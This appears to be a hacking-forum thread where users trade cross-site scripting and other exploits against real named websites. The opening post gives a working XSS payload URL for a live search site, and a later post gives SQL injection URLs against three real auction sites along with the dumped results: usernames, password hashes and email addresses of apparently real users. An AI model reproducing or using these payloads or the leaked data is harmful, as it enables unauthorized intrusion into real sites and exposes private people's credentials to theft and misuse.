Question & Sharing:XSS(SE)

Who has found an XSS or other exploit on a Search Engine? Here's what you do…You tell everyone that you have then say the site.Then the site with it's vuln. eg. Yes http://vunsite.com/ http://vunsite.com/whever-here?another-thing=XSS exploit

I'll go first:)(It is my thread remember;)) Yes,Yes I have http://www.seagency.info/ http://www.seagency.info/search.php?search=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3B&button=Search+The+Web&type=web WARNING: This will give you quite a few XSS alerts!(unless you repeatidly press escape) P.S It doesn't have to be a search engine but it can't be just any old site it has to be either Search Engine,Well known,or a goverment site;) SaMTHG:):D

how about just stay on xssed.com? I mean what is the point if normally you'll submit it on xssed, where anybody can find it…

and pls edit your post, so it doesn't screw up the layout of page

I've currently got 1437 XSS vulnerabilities posted on XSSed.com (2017 points, if you're interested)

Posting them all here would be kind of useless, so here are two links instead :happy:

http://xssed.com/archive/author=Uber0n/ http://xssed.com/top

Uber0n wrote: I've currently got 1437 XSS vulnerabilities posted on XSSed.com (2017 points, if you're interested)

Posting them all here would be kind of useless, so here are two links instead :happy:

thats because thats all you do in your spare time.

i only have like 20 something

Uber0n wrote: I've currently got 1437 XSS vulnerabilities… http://xssed.com/top

That is sick !! ( in a good way:D)

Uber0n wrote: I've currently got 1437 XSS vulnerabilities posted on XSSed.com (2017 points, if you're interested)

Posting them all here would be kind of useless, so here are two links instead :happy:

http://xssed.com/archive/author=Uber0n/ http://xssed.com/top

Impressive. Number 1 on XSSed :whoa:. I've XSSed tons and tons of sites, never submitted any to XSSed though :\

fallingmidget wrote: thats because thats all you do in your spare time.

Haha not really ^^ I have a girlfriend, I go to quite a lot of parties, meet friends and the last month I've spent like 4-5 days a week fishing (without any internet access at any time of the day) ;)

SQL injection is better :happy:

http://www.bosguides.com/auction/profile.php?user_id=1&auction_id=-2+union+select+concat_ws(0x2F2A2A2F,nick,password,email)+from+PHPAUCTION_users+limit+1,1/*

Leave Feedback about "KreateIt5//af004f03fff7edb613c58897105b7df1//jerseyshore58@aol.com"

http://www.cyauction.co.uk/profile.php?user_id=1&auction_id=-2+union+select+concat_ws(0x2F2A2A2F,nick,password,email)+from+PHPAUCTION_users+limit+1,1/*

Leave Feedback about "laralouise84//4e43f861fab92a9bf3f3ee0c46f05c21//laralouise84@yahoo.co.uk"

http://holidayauctionhouse.com/profile.php?user_id=1&auction_id=-2+union+select+concat_ws(0x2F2A2A2F,nick,password,email)+from+PHPAUCTION_users+limit+1,1/*

Leave Feedback about "Stevob//0265ceed317cfe3eb4fc386a4c65de86//Steve_b81@hotmail.com"

Just a couple :D

I have a deep new respect for Uber0n, thats a hell of a lot of XSS vulns! Kudos